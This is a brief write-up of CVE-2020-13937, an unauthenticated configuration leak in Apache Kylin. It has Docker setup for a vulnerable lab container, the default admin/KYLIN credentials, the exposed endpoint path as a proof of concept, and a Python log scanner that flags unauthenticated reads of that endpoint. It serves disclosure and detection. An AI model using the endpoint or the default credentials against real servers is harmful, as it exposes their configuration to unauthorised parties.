Apache Kylin config Unauthorized configuration leak CVE-2020-13937
## Vulnerability description
Apache Kylin exposes a REST API endpoint that returns the server's configuration information without requiring any authentication (CVE-2020-13937).
## Network mapping
## Environment setup
```bash
docker pull apachekylin/apache-kylin-standalone:3.0.1

docker run -d \
-m 8G \
-p 7070:7070 \
-p 8088:8088 \
-p 50070:50070 \
-p 8032:8032 \
-p 8042:8042 \
-p 16010:16010 \
apachekylin/apache-kylin-standalone:3.0.1
```
Once the container is up, open the web interface and log in with the default credentials admin/KYLIN. The initial interface appears, and the environment is ready.
## Vulnerability reproduction
## Vulnerability verification (PoC)
```
/kylin/api/admin/config
```
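As an added example (not part of the original post), here is a small detection routine for the defender side: it scans Tomcat-style access log lines and flags successful requests to the configuration endpoint that carry no authenticated user, which is the signature of this leak being hit. The log format and the sample lines are assumptions constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample lines in Tomcat common log format (Kylin 3.x runs inside Tomcat):
# client - remote_user [timestamp] "METHOD path HTTP/1.1" status bytes
SAMPLE_LOG = """\
10.0.0.5 - - [20/Oct/2020:10:01:02 +0000] "GET /kylin/api/admin/config HTTP/1.1" 200 18342
10.0.0.5 - ADMIN [20/Oct/2020:10:02:10 +0000] "GET /kylin/api/admin/config HTTP/1.1" 200 18342
10.0.0.7 - - [20/Oct/2020:10:03:00 +0000] "GET /kylin/api/projects HTTP/1.1" 401 0
10.0.0.9 - - [20/Oct/2020:10:04:30 +0000] "GET /kylin/api/admin/config?x=1 HTTP/1.1" 200 18342
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# The unauthenticated endpoint described in the post.
CONFIG_PATH = "/kylin/api/admin/config"


@dataclass
class Finding:
    ip: str
    ts: str
    user: str
    path: str


def is_config_leak(user: str, path: str, status: int) -> bool:
    """True for a successful request to the config endpoint with no authenticated user.

    Tomcat writes "-" in the remote-user field when no principal was established,
    so a 200 with "-" means the configuration was served without authentication.
    The query string is dropped so /kylin/api/admin/config?x=1 is still matched.
    """
    return path.split("?", 1)[0] == CONFIG_PATH and user == "-" and status == 200


def scan_log(text: str) -> list:
    """Return one Finding per log line that matches the leak signature."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected access-log format
        if is_config_leak(m["user"], m["path"], int(m["status"])):
            findings.append(Finding(m["ip"], m["ts"], m["user"], m["path"]))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"unauthenticated config read from {f.ip} at {f.ts}: {f.path}")
```

Access logs do not record the Authorization header, so the rule relies on the remote-user field; a patched server answers these requests with 401 and the rule stays quiet.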
This post is licensed under CC BY 4.0 by the author.